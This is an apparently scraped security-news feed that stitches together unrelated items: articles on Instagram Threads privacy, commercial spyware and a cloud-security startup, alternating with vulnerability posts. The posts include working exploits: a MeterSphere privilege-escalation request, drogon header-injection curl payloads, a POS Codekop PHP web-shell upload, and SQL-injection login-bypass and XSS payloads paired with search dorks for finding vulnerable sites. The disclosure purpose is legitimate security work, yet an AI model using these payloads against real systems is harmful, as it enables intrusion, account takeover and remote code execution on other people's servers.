Meta's answer to Twitter went live and quickly racked up millions of members — but the social media app's privacy practices are under the microscope.

A full 20 million people (and counting) had signed up for Meta's Twitter competitor within hours of its launch Wednesday evening — but none of those users will be in the European Union, thanks to data privacy concerns.

Instagram Threads collects a wide range of data from users, according to its "App Privacy" blurb on the Apple App Store, including health information, purchase histories, financial data, location, contact lists, search and browsing history, usage data, and a somewhat ominous category of data listed as simply "sensitive info."

Officials at Meta, which was just slapped with a record-breaking $1.3 billion fine for violating the EU's GDPR law on data privacy, told the Irish Independent that it's holding off on the rollout of the service "for now," citing a lack of clarity around the EU's Digital Markets Act, which governs how companies use behavioral advertising and various data sources.

Instagram CEO Adam Mosseri is also on record as acknowledging "complexities with complying with some of the laws coming into effect next year."

    

Source: Instagram via the Apple App Store.

Aaron Mendes, CEO and co-founder of PrivacyHawk, noted in a statement sent to Dark Reading that Threads' data collection policies are intertwined with those of Instagram, and largely follow the same pattern with regard to using that data for targeted advertising, algorithm tweaking, and more. But, he noted, users do have some control.

"It is a reminder of the depth of data Meta collects on its users and that you are the product when you use any of their services," he said. "If you will use them and care about your privacy, take the time to go into their privacy settings and select more private settings than the default. And don't give them access to everything they ask for. And take back things they don’t need anymore. You can still use most of their services without giving them everything they want."

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

Privacy Woes Hold Up Global Instagram Threads Launch

An issue in Zimbra Collaboration ZCS v.8.8.15 and v.9.0 allows an attacker to execute arbitrary code via the sfdc_preauth.jsp component.

CVE-2023-29382: Security Center - Zimbra :: Tech Center

Metersphere is an open source continuous testing platform. In versions prior to 2.10.2 LTS, some key APIs in Metersphere lack permission checks. This allows ordinary users to execute APIs that can only be executed by space administrators or project administrators. For example, ordinary users can be updated as space administrators. Version 2.10.2 LTS has a patch for this issue.

**Summary**

目前metersphere 一些关键的API缺少了权限检查，比如workspace中的/setting/workspace/member/update，/setting/user/special/ws/member/add, /special/ws/member/delete/{workspaceId}/{userId} 以及project相关的API。

**PoC**

以workspace中的/setting/workspace/member/update利用为例

1 user1 是workspace1的空间管理员

2 user2 是workspace1的成员

3 user1 更新user2的信息，比如将其更新为空间管理员

4 使用burpsuite拦截请求

    以workspace中的/setting/workspace/member/update 为例
    
    POST /setting/workspace/member/update HTTP/1.1
    Host: 192.168.213.128:8081
    Content-Length: 144
    Accept-Language: zh-CN
    WORKSPACE: bd6fc04b-15af-43dc-8cb6-411deaec81a7
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36
    Content-Type: application/json
    Accept: application/json, text/plain, */*
    CSRF-TOKEN: 7wl7UAaQcpdQ+lolQXV1WYWQ+BLvd2bx2BQS22BoFb3UGqDlIbQjbELrNWgOzLgfc4YPf6nSUgllo/qpOudisg==
    X-AUTH-TOKEN: 52d843aa-8791-43be-a191-f04f975f2be2
    PROJECT: 2d2c879f-3f78-4701-aa6f-35aeedc25069
    Origin: http://192.168.213.128:8081
    Referer: http://192.168.213.128:8081/
    Accept-Encoding: gzip, deflate
    Cookie: __stripe_mid=f2258077-6e3a-4225-8013-a67c38c075f2242a35; step_dashboard=true; step_client_index=true; lang=zh-cn; device=desktop; theme=default; preExecutionID=1; lastTaskModule=0; lastBugModule=0; preBranch=0; storyPreExecutionID=1; lastProduct=0; lastDocModule=0; checkedItem=6%2C4%2C3; docFilesViewType=card; preProductID=1; goback=%7B%22execution%22%3A%22http%3A%5C%2F%5C%2F192.168.213.128%5C%2Fbug-view-7.html%22%2C%22admin%22%3A%22http%3A%5C%2F%5C%2F192.168.213.128%5C%2Fcompany-browse.html%22%2C%22qa%22%3A%22http%3A%5C%2F%5C%2F192.168.213.128%5C%2Fbug-view-7.html%22%2C%22doc%22%3A%22http%3A%5C%2F%5C%2F192.168.213.128%5C%2Fdoc-objectLibs-custom-0-9.html%22%7D; tab=execution
    Connection: close
    
    {"id":"user2","name":"user2","email":"user2@test.com","phone":null,"groupIds":["ws_admin"],"workspaceId":"bd6fc04b-15af-43dc-8cb6-411deaec81a7"}
    

5 将上述请求中的CSRF-TOKEN和X-AUTH-TOKEN替换成user2的，即以user2的身份执行请求

6 发现执行结果成功，即普通用户可以执行管理员才能执行的update

**Impact**

普通用户可以执行空间管理员或者project管理员才能执行的API，比如可以将普通用户更新成空间管理员。

CVE-2023-35937: metersphere 存在权限检查缺失漏洞

Commercial spyware has become so notorious that international governments are taking notice and action against it, as evidenced by the Biden administration’s recent Executive Order on commercial spyware.

Thursday, July 6, 2023 08:07

Attackers have long used commercial products developed by legitimate companies to compromise targeted devices. These products are known as commercial spyware. Commercial spyware operations mainly target mobile platforms with zero- or one-click zero-day exploits to deliver spyware. This threat initially came to light with the leaks of HackingTeam back in 2015, but gained new notoriety with public reporting on the NSO Group, and, in the years that have followed, the landscape has exploded.

There are now numerous companies with similar offerings, like Intellexa, DSIRF, Variston IT, and the newly disclosed Quadream representing just a small subset — there are likely more that are operating covertly today.

Commercial spyware has become so notorious that international governments are taking notice and action against it, as evidenced by the Biden administration’s recent Executive Order on commercial spyware. A recent report from the United Kingdom’s National CyberSecurity Center (NCSC) highlights the accessibility of these tools “lowers the barrier to entry to state and non-state actors in obtaining capability and intelligence.” As recently as June 2023, the European Parliament’s plenary session voted on an ongoing investigation concerning the illicit usage of NSO’s Pegasus and equivalent surveillance spyware by EU member states (PEGA report). In this session, European Parliament members argued that the illicit usage of spyware has put “democracy itself at stake” and called for legislative changes and stricter regulation of the use of commercial spyware. The full press release and report can be found here.

**Commercial spyware companies don't care who is targeted by their products**

Commercial spyware companies advertise their products simply as a means of obtaining access and deny having any knowledge of who their customers’ targets are. This tactic is possibly a means of plausible deniability in the event that illegal targeting of individuals is traced back to their spyware. To avoid legal repercussions, these companies have headquarters in countries that do not have laws governing the export of their products or which classify the entities as IT service providers, effectively removing them from any product liability. These companies can therefore ultimately sell to whomever can pay without regard for who the intended targets are or what the impacts on the victims might be.

Although advertised as “tools” for law enforcement and government agencies strictly intended for legal use, report after report has shown commercial spyware has consistently been used against ethically questionable targets that don't fit the profile of criminals or terrorists. Such targets have repeatedly been journalists, politicians and activists who the host government perceives as competitors or existential threats. While these technologies may exist to fight terrorism and organized crime, their sale and usage must be regulated and subject to scrutiny by judicial authorities at an international level to prevent their misuse and abuse.  

One such example of limited repercussions within a host state is the case where a journalist in Greece was targeted with Predator Spyware, eventually leading to the resignation of Greece’s National Intelligence Service’s director in 2022 and the subsequent ban on the use of commercial spyware in Greece. Earlier in 2022, we also saw the departure of the NSO group’s CEO from the company amid widespread public outrage over the use of their spyware by Israeli Police forces.

**The untethered future of commercial spyware**

Mobile platform developers such as Google and Apple have repeatedly introduced and implemented protections and mitigations in their operating systems. However, commercial spyware providers often use zero-day, zero-click exploits to compromise victims’ mobile devices and are so confident in their ability to repeatedly compromise phones _without getting caught_ that, in some cases, they don't even deploy persistence mechanisms — a simple device reboot is enough to remove the implant from the device. However, a device reboot simply results in the commercial spyware outfit reinfecting the device using the zero-day, zero-click combination they had used during the initial compromise indicating the aggressive nature of these campaigns.

We see no indications that these commercial spyware offerings are slowing down. If anything, they are growing along with the constant availability of exploitable, unpatched/unknown vulnerabilities. Until the international community acts to regulate the technology, very little is going to change. When exposed by researchers, some of these companies just cease to exist. But in reality, they do not shut down, they just rebrand under a different name or merge with others sharing the technology they have produced. A typical example of such a case is the commercial spyware firm Cytrox, which was on the verge of disappearing, but was subsequently “rescued” and is now part of the Intellexa conglomerate.

Private and government organizations have taken steps to legally curb the use of commercial spyware, including attempts to hold them responsible for their actions in the past. Meta, formerly Facebook, is one of the first to move against commercial spyware companies by opening a lawsuit against the NSO Group for leveraging Meta-owned WhatsApp in their infection chain. The Biden administration has also taken an important step in fighting these companies with the Executive Order putting limitations on the U.S. government's ability to use commercial spyware to “discourage the improper use of commercial spyware; and encourage the development and implementation of responsible norms regarding the use of commercial spyware that are consistent with respect for the rule of law, human rights, and democratic norms and values.”

However, limited legal and legislative actions are yet to have an _immediate_ positive effect on curbing the use of commercial spyware. Despite these steps toward limiting the operations of these spyware companies, they are likely to keep operating in any region as long as it's financially and legally feasible. Increasing scrutiny with export regulations, criminal liability and fines may be a way forward towards ensuring that their activity does not go beyond the legitimate purposes they advertise.

**Risk profile**

For almost everyone on the planet, your Apple or Android phone’s built-in security features are more than sufficient to keep you protected. However, the commercial spyware industry has proven that it is easy to compromise targets if you have access to these products and the means to use them. We've seen numerous deeply concerning reports of people being compromised and are commonly met with the news that it was a journalist or dissident. The ability of these companies to repeatedly compromise devices, regardless of patch level, makes protection difficult.

For those that believe they are being or could be targeted by commercial spyware, rebooting the device before contacting a source or switching to lockdown mode might be the only options for the foreseeable future.

If you feel that you have been targeted by commercial spyware, there are also more generic habits that should be part of your daily routine:

*   Reboot your device regularly.
*   Use lockdown mode if your device is an iPhone.
*   Don’t click on links from dubious sources.
*   Don’t accept private messages from unknown persons.
*   If you have to keep a public contact, use an empty device to receive such contacts and reset it frequently.
*   Keep your devices up-to-date.

_If readers suspect their system(s) may have been compromised by commercial spyware or hack-for-hire groups, please consider notifying Talos’ research team at talos-mercenary-spyware-help@external.cisco.com to assist in furthering the community’s knowledge of these threats._

The growth of commercial spyware based intelligence providers without legal or ethical supervision

All versions of the package drogonframework/drogon are vulnerable to HTTP Response Splitting when untrusted user input is used to build header values in the addHeader and addCookie functions. An attacker can add the \r\n (carriage return line feeds) characters to end the HTTP response headers and inject malicious content.

HTTP Response Splitting in drogon@v1.8.4

**Information**

**Project:** drogon

**Tested Version:** v1.8.4

**Github Repository:** https://github.com/drogonframework/drogon

**Details**

drogon is vulnerable to **HTTP Response Splitting** when untrusted user input is used to build headers values in the addHeader and addCookie functions. An attacker can add the \r\n (carriage return line feeds) characters to end the HTTP response headers and inject malicious content, like for example additional headers or new response body, leading to a potential XSS vulnerability.

More reference about this vulnerability and its impact:

*   https://owasp.org/www-community/attacks/HTTP\_Response\_Splitting
*   https://cwe.mitre.org/data/definitions/113.html

Reference to similar issues affecting other projects:

*   https://security.snyk.io/vuln/SNYK-SWIFT-APPLESWIFTNIO-3105796

**Setup**

*   install dependencies (tested on Ubuntu): https://github.com/drogonframework/drogon/wiki/ENG-02-Installation#system-preparation-examples
    
*   install the project: https://github.com/drogonframework/drogon/wiki/ENG-02-Installation#drogon-installation
    

**PoC**

The PoC demonstrates how it's possible to add arbitrary headers and response body if user controlled values are used to set the headers value.

*   create a web server:

drogon\_ctl --version
A utility for drogon
Version: 1.8.4
Git commit: 87a3132fd1c0da1a88e080c879a9e55af71586be

drogon\_ctl create project server

*   paste the server code in main.cc (inspired by https://github.com/drogonframework/drogon/blob/master/examples/helloworld/main.cc)
    
*   build and run the server
    

cd build
cmake ..
make
./server

*   run the following curl commands to observe the response (or directly open the links in the browser to see the xss alert)

curl -i -X GET "http://localhost:8889/test1?user=A%0d%0aSet-Cookie:+admin=1%0d%0aFoo:+Bar%0d%0a%0a%3Cimg+src%3dx+onerror%3dalert(%22hello%22)+/%3E%0d%0a"
HTTP/1.1 200 OK
content-length: 39
content-type: text/html; charset=utf-8
server: drogon/1.8.4
myheader: A
Set-Cookie: admin=1
Foo: Bar

<img src=x onerror=alert("hello") />

curl -i -X GET "http://localhost:8889/test2?user=A%0d%0aFoo:+Bar%0d%0a%0a%3Cimg+src%3dx+onerror%3dalert(%22hello%22)+/%3E%0d%0a"
HTTP/1.1 200 OK
content-length: 39
content-type: text/html; charset=utf-8
server: drogon/1.8.4
Set-Cookie: MyCookie=A
Foo: Bar

<img src=x onerror=alert("hello") />
;

curl -i -X GET "http://localhost:8889/test3?user=A%0d%0aSet-Cookie:+admin=1%0d%0aFoo:+Bar%0d%0a%0a%3Cimg+src%3dx+onerror%3dalert(%22hello%22)+/%3E%0d%0a"
HTTP/1.1 200 OK
content-length: 39
content-type: text/html; charset=utf-8
server: drogon/1.8.4
myheader: A
Set-Cookie: admin=1
Foo: Bar

<img src=x onerror=alert("hello") />

**Impact**

If untrusted user input is placed in header values, a malicious user could inject additional headers. It can lead to logical errors and other misbehaviours.

**Author**

Alessio Della Libera

#include <drogon/drogon.h>

using namespace drogon;

int main()

{

// curl -i -X GET "http://localhost:8889/test1?user=A%0d%0aSet-Cookie:+admin=1%0d%0aFoo:+Bar%0d%0a%0a%3Cimg+src%3dx+onerror%3dalert(%22hello%22)+/%3E%0d%0a"

app().registerHandler(

"/test1?user={user-name}",

\[\](const HttpRequestPtr &, std::function<void(const HttpResponsePtr &)\> &&callback, const std::string &name) {

auto resp \= HttpResponse::newHttpResponse();

resp\->addHeader("MyHeader", name);

resp\->setBody("Hello world!!!!!!!!!!!!!!!!!!!!!!!!!!!\\n");

callback(resp);

},

{Get});

// curl -i -X GET "http://localhost:8889/test2?user=A%0d%0aFoo:+Bar%0d%0a%0a%3Cimg+src%3dx+onerror%3dalert(%22hello%22)+/%3E%0d%0a"

app().registerHandler(

"/test2?user={user-name}",

\[\](const HttpRequestPtr &, std::function<void(const HttpResponsePtr &)\> &&callback, const std::string &name) {

auto resp \= HttpResponse::newHttpResponse();

resp\->addCookie("MyCookie", name);

resp\->setBody("Hello world!!!!!!!!!!!!!!!!!!!!!!!!!!!\\n");

callback(resp);

},

{Get});

// curl -i -X GET "http://localhost:8889/test3?user=A%0d%0aSet-Cookie:+admin=1%0d%0aFoo:+Bar%0d%0a%0a%3Cimg+src%3dx+onerror%3dalert(%22hello%22)+/%3E%0d%0a"

app().registerHandler(

"/test3",

\[\](const HttpRequestPtr &req,

std::function<void(const HttpResponsePtr &)\> &&callback) {

auto resp \= HttpResponse::newHttpResponse();

auto name \= req\->getOptionalParameter<std::string\>("user");

if (name)

resp\->addHeader("MyHeader", name.value());

resp\->setBody("Hello world!!!!!!!!!!!!!!!!!!!!!!!!!!!\\n");

callback(resp);

},

{Get});

LOG\_INFO << "Server running on 0.0.0.0:8889";

app().addListener("0.0.0.0", 8889).run();

}

CVE-2023-26137: HTTP Response Splitting in drogon@v1.8.4

The startup, one of four finalists in Black Hat USA's 2023 startup competition, uses deterministic AI to optimize cloud security.

Cloud misconfigurations are a leading cause of breaches that lead to data loss for the enterprise, especially with the continued shift to cloud and multicloud environments. But surveying and monitoring all possible endpoints and connections with cloud services is too big a job for humans to accomplish alone — which is how such breaches proliferate. Gomboc.ai aims to solve the problem with a proprietary type of deterministic artificial intelligence (AI) that the company says sidesteps the issues with the more well-known generative AI model.

That hook — deterministic AI — earned Gomboc a spot in the finals of the second annual Startup Spotlight, presented by Black Hat USA. "We are solving the cloud security misconfiguration problem," says CEO and co-founder Ian Amit. That would be a huge accomplishment, since such problems cause most cloud breaches.

"Security misconfiguration backlogs are one of the highest priority issues CISOs deal with since they pose an immediate threat to the organization's cloud security posture, and existing solutions that focus on prioritization and ticketing do not provide a scalable way to address those," Amit adds.

**What Is Deterministic AI?**

Generative AI, which includes high-profile models like OpenAI's ChatGPT and Google's Bard, analyzes large collections of data to learn the structures well enough to assemble plausible new content from it — that is, it _generates_ outputs. Deterministic AI, on the other hand, defines data characteristics so that a specific problem will have one specific, correct solution that does not change — that is, the data values _determine_ the outputs.

Amit sees this as one of his company's great differentiators.

"\[W\]hen given the same input, Gomboc will always provide the same output — a crucial factor when writing secure code," he says. "Gomboc does not generate nor hallucinate any sort of IaC."

Generative, or stochastic, AI systems generate code based on statistical analysis, which Amit says can result in code that's inaccurate, imprecise, or bereft of context.

Instead, Gomboc built a proprietary ingestion engine that processes cloud service provider updates as they're released. It then applies the new data to clients' existing network policies, pushing any fixes live itself rather than issuing a ticket for a human to address. The tool works within existing DevSecOps environments, Amit says, keeping approval simple and easy to track.

    

Of course, deterministic AI, aka reactive AI or expert systems, is not an approach exclusive to Gomboc. Other security companies that employ deterministic AI include identity verification service Vouched and life-science compliance firm LighthouseAI. But by focusing on the highly complex and fraught multicloud environment, Gomboc is putting the technology to good use.

**What's Ahead for Gomboc**

The four finalists in the Black Hat Startup Spotlight — Gomboc, Binarly, Endor Labs, and Mobb — will present their business models to a panel of judges at the Mandalay Bay in Las Vegas on Wednesday, Aug. 9. Eligible candidates included companies that are 2 years old or less and have fewer than 50 employees. Dark Reading's editor-in-chief, Kelly Jackson Higgins, will host the event, which begins at 4:30 p.m. PT.

Amit says that his company's future plans include expanding to more environments, especially multicloud and hybrid installations. At the Black Hat USA booth, he promises a product demo and merch, as well as a chance to talk to the team who built the product.

The story of the company name is an interesting one: A gomboc is a geometric solid with exactly two points of equilibrium, one stable and one unstable. That means it will always return to its stable equilibrium point, no matter how it's pushed or rolled.

"Our platform turns everyone's cloud infrastructure into a self-righting environment \[in a security sense\] no matter how a company grows or scales. A Gomboc is a shape that does exactly that: It always rights itself no matter how much you push it," Amit says. "We're big math nerds here at Gomboc, so the shape and analogy have a special place in our hearts."

**Speed Round**

**Website:** https://www.gomboc.ai/  
**Founded:** Late 2022 (Funded in November)  
**Funding stage:** Seed  
**Total funding raised so far:** $5.3M  
**Number of employees:** 10  
**If the company were a band, what would its band name be, and what kind of band would it be:** Ship or Be Shipped (Hard Rock/Metal)  
**Pineapple on pizza, yea or nay?:** "As New Yorkers, it's absolutely nay."

Startup Spotlight: Gomboc.ai Balances Cloud Infrastructure Security

Instagram Threads, the upcoming Twitter competitor from Meta, will not be launched in the European Union due to privacy concerns, according to Ireland's Data Protection Commission (DPC).
The development was reported by the Irish Independent, which said the watchdog has been in contact with the social media giant about the new product and confirmed the release won't extend to the E.U. "at this

Instagram Threads, the upcoming Twitter competitor from Meta, will not be launched in the European Union due to privacy concerns, according to Ireland's Data Protection Commission (DPC).

The development was reported by the Irish Independent, which said the watchdog has been in contact with the social media giant about the new product and confirmed the release won't extend to the E.U. "at this point."

Threads is Meta's answer to Twitter that's set for launch on July 6, 2023. It's billed as a "text-based conversation app" that allows Instagram users to "discuss everything from the topics you care about today to what'll be trending tomorrow."

It also enables users to follow the same accounts they already follow on Instagram. A listing for the app has already appeared in the Apple App Store and Google Play Store, although it's yet to be available for download.

The "App Privacy" section on the App Store indicates that the application is expected to collect a wide range of user data, including Health and Fitness, Purchases, Financial Info, Location, Contact Info, Contacts, User Content, Search History, Browsing History, Identifiers, Usage Data, Sensitive Info, and Diagnostics.

It's believed that while the DPC has not actively blocked Threads from being launched, Meta is taking a cautious approach to bring the service to the region, which has stringent privacy protections. It's worth noting that Google postponed the launch of its artificial intelligence chatbot Bard in the E.U. for similar reasons.

The development coincides with a series of policy changes at Twitter, which began blocking unregistered users from being able to use the site on the web and enforced temporary rate limits for logged-in users to restrict the number of posts they can see per day.

The Elon Musk-owned company said it's taking the step to "detect and eliminate bots and other bad actors that are harming the platform" by "scraping people's public Twitter data to build AI models" and "manipulating people and conversation on the platform in various ways."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Instagram's Twitter Alternative 'Threads' Launch Halted in Europe Over Privacy Concerns

POS Codekop version 2.0 suffers from a remote shell upload vulnerability.

    # Exploit Title: POS Codekop v2.0 - Authenticated Remote Code Execution (RCE)# Date: 25-05-2023# Exploit Author: yuyudhn# Vendor Homepage: https://www.codekop.com/# Software Link: https://github.com/fauzan1892/pos-kasir-php# Version: 2.0# Tested on: Linux# CVE: CVE-2023-36348# Vulnerability description: The application does not sanitize the filenameparameter when sending data to /fungsi/edit/edit.php?gambar=user. Anattacker can exploit this issue by uploading a PHP file and accessing it,leading to Remote Code Execution.# Reference: https://yuyudhn.github.io/pos-codekop-vulnerability/# Proof of Concept:1. Login to POS Codekop dashboard.2. Go to profile settings.3. Upload PHP script through Upload Profile Photo.Burp Log Example:```POST /research/pos-kasir-php/fungsi/edit/edit.php?gambar=user HTTP/1.1Host: localhostContent-Length: 8934Cache-Control: max-age=0sec-ch-ua:sec-ch-ua-mobile: ?0sec-ch-ua-platform: ""**Upgrade-Insecure-Requests: 1Origin: http://localhostContent-Type: multipart/form-data;boundary=----WebKitFormBoundarymVBHqH4m6KgKBnpaUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/114.0.5735.91 Safari/537.36Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-User: ?1**Sec-Fetch-Dest: documentReferer: http://localhost/research/pos-kasir-php/index.php?page=userAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=vqlfiarme77n1r4o8eh2kglfhvConnection: close------WebKitFormBoundarymVBHqH4m6KgKBnpaContent-Disposition: form-data; name="foto"; filename="asuka-rce.php"Content-Type: image/jpegÿØÿà JFIF HHÿþ6<?php passthru($_GET['cmd']); __halt_compiler(); ?>ÿÛC-----------------------------```PHP Web Shell location:http://localhost/research/pos-kasir-php/assets/img/user/[random_number]asuka-rce.php

POS Codekop 2.0 Shell Upload

AppleZeed CMS version 2.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

**AppleZeed CMS 2.0 SQL Injection**

Posted Jul 4, 2023

Authored by indoushka

AppleZeed CMS version 2.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

tags | exploit, remote, sql injection

SHA-256 | b10dc7fe6d4f1a88b74eac3ee061dec5b828171e6513804abc4b45080828e37b

Download | Favorite | View

**AppleZeed CMS 2.0 SQL Injection**

    ====================================================================================================================================| # Title     : AppleZeed CMS v2.0 Auth by pass Vulnerability                                                                      || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 71.0(32-bit)                                               | | # Vendor    : https://applezeed.com                                                                                              |  | # Dork      : intext:"Power BY applezeed.com "php?id="                                                                           |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : user & pass = 1' or 1=1 -- -[+] admin path = /backend/[+] http://TARGET/backend/Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,564)
*   Arbitrary (16,123)
*   BBS (2,859)
*   Bypass (1,725)
*   CGI (1,025)
*   Code Execution (7,205)
*   Conference (678)
*   Cracker (841)
*   CSRF (3,331)
*   DoS (23,296)
*   Encryption (2,364)
*   Exploit (51,438)
*   File Inclusion (4,203)
*   File Upload (960)
*   Firewall (821)
*   Info Disclosure (2,743)
*   Intrusion Detection (888)
*   Java (3,007)
*   JavaScript (845)
*   Kernel (6,610)
*   Local (14,414)
*   Magazine (586)
*   Overflow (12,629)
*   Perl (1,423)
*   PHP (5,136)
*   Proof of Concept (2,336)
*   Protocol (3,571)
*   Python (1,526)
*   Remote (30,592)
*   Root (3,574)
*   Rootkit (506)
*   Ruby (611)
*   Scanner (1,633)
*   Security Tool (7,862)
*   Shell (3,170)
*   Shellcode (1,212)
*   Sniffer (893)
*   Spoof (2,193)
*   SQL Injection (16,261)
*   TCP (2,395)
*   Trojan (687)
*   UDP (885)
*   Virus (664)
*   Vulnerability (31,656)
*   Web (9,602)
*   Whitepaper (3,747)
*   x86 (961)
*   XSS (17,795)
*   Other

**File Archives**

*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (1,981)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,921)
*   Debian (6,783)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,321)
*   HPUX (879)
*   iOS (346)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,075)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (483)
*   RedHat (13,489)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,716)
*   UNIX (9,256)
*   UnixWare (186)
*   Windows (6,560)
*   Other

AppleZeed CMS 2.0 SQL Injection

Adveris CMS version 3.0 suffers from a cross site scripting vulnerability.

**Adveris CMS 3.0 Cross Site Scripting**

Posted Jul 4, 2023

Authored by indoushka

Adveris CMS version 3.0 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | f4e69d15add89915deaf239446b331cc9106cc57ee69bf29f992d6be03d4d471

Download | Favorite | View

**Adveris CMS 3.0 Cross Site Scripting**

    ====================================================================================================================================| # Title     : Adveris CMS v3.0 XSS Vulnerability                                                                                || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 68.0(32-bit)                                               | | # Vendor    : http://adveris.fr                                                                                                  |  | # Dork      : "Création site internet : Adveris" inurl:.php?id=                                                                  |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : /sous-categorie.php?id=6<--`<script>alert(/indoushka/);</script>``> --!>[+] http://w127.0.0.1/coveprofr/sous-categorie.php?id=6%3C--`%3Cscript%3Ealert(/indoushka/);%3C/script%3E``%3E%20--!%3EGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,556)
*   Arbitrary (16,119)
*   BBS (2,859)
*   Bypass (1,725)
*   CGI (1,025)
*   Code Execution (7,203)
*   Conference (678)
*   Cracker (841)
*   CSRF (3,329)
*   DoS (23,289)
*   Encryption (2,363)
*   Exploit (51,413)
*   File Inclusion (4,202)
*   File Upload (960)
*   Firewall (821)
*   Info Disclosure (2,742)
*   Intrusion Detection (888)
*   Java (3,007)
*   JavaScript (845)
*   Kernel (6,610)
*   Local (14,412)
*   Magazine (586)
*   Overflow (12,628)
*   Perl (1,423)
*   PHP (5,134)
*   Proof of Concept (2,336)
*   Protocol (3,571)
*   Python (1,526)
*   Remote (30,582)
*   Root (3,573)
*   Rootkit (506)
*   Ruby (611)
*   Scanner (1,633)
*   Security Tool (7,861)
*   Shell (3,168)
*   Shellcode (1,212)
*   Sniffer (893)
*   Spoof (2,193)
*   SQL Injection (16,254)
*   TCP (2,395)
*   Trojan (687)
*   UDP (885)
*   Virus (664)
*   Vulnerability (31,654)
*   Web (9,600)
*   Whitepaper (3,747)
*   x86 (961)
*   XSS (17,791)
*   Other

**File Archives**

*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (1,981)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,921)
*   Debian (6,782)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,321)
*   HPUX (879)
*   iOS (346)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,067)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (483)
*   RedHat (13,489)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,709)
*   UNIX (9,256)
*   UnixWare (186)
*   Windows (6,560)
*   Other

Tag

#apple